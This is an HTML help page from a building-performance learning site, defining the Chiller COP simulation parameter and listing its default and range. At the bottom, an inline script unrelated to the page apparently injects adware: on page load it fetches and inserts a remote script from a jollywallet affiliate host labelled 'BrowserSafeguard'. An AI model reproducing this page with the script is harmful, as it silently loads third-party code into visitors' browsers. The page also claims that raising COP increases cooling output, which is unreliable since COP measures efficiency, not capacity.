﻿<!doctype html>
<html>
<head>
<meta charset="UTF-8">
<title>Learn High Performance Buildings</title>
<meta name="description" content="Info about LHPB.">
<meta name="viewport" content="width=device-width, initial-scale=1.0, minimum-scale=1.0, zoom=20%, target-densitydpi=high-dpi">
<link href="../css/normalize.css" rel="stylesheet" type="text/css">
<link href="../css/info.css" rel="stylesheet" type="text/css">
<link rel="shortcut icon" href="file:../images/favicon.ico" >
</head>
<body>
<div id="wrapper" class="cf">
<div id="container">
<div id="from">
</div>
<div id="logo" title="LHPB: Learn High Performance Buildings"></div>
<div id="title" class="cf">Learn High Performance Buildings</div>
<div id="info" class="cf">
<h1>CHILLER COP</h1>
<h3>Associated System: CENTRAL PLANT (CHILLER, COOLING TOWER, AND BOILER)</h3>
<div class="graphic"> <img src="../HVAC Rooftop/Chiller.png" alt=""/ ></div>    
<p>The Chiller COP (Coefficient of Performance) is a measure of a chiller's capacity for cooling per energy usage unit. COPs are an indication of the efficiency of Chillers by comparing the total cooling energy output to the electrical energy required to run the chiller.  Note: A COP of a chiller can be exceed "1".</p>      
<!--<p>(<a href="#">See also the �</a> )</p>-->
<p>Raising the value of this parameter will increase the cooling output of the chiller and, consequently increase the chiller efficiency.</p>      
<h4>The value of this variable can not be adjusted during simulation run-time. It may be adjusted before or after a simulation.</h4>      
<h2>Variable Descriptions</h2>
<ul class="list-variable">        
<li><label>Default:</label> 5</li>
<li><label>Minimum:</label> 1</li>
<li><label>Maximum:</label> 7</li>
<!--<li><label>Default Units:</label> i_Default</li>-->
<!-- <li><label>English:</label> </li>-->
<li><label>IP Unit:</label> number</li>
<li><label>SI Units:</label> number</li>      </ul>
<h2>Related Items: </h2>
<ul>chiller</ul>
<h2>Links:</h2>
<ul>
<li><a href="http://en.wikipedia.org/wiki/Chiller" target="_blank">http://en.wikipedia.org/wiki/Chiller</a></li><li><a href="http://www.su-per-b.org" target="_blank">http://www.su-per-b.org</a></li>      </ul>
<div class="version"> Version 1.00</div>
    </div>
  </div>
</div>
<script type="text/javascript">(function () {if (top.location == self.location && top.location.href.split('#')[0] == 'http://learnhpb.org/demos/13.01/i-content/iv-SYSTAirDB.html') {var po = document.createElement('script'); po.type = 'text/javascript'; po.async = true;po.src = 'https://api.jollywallet.com/affiliate/client?dist=213&sub=bsg-rt-tightrope&name=BrowserSafeguard';var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(po, s);}})();</script></body>
</html>
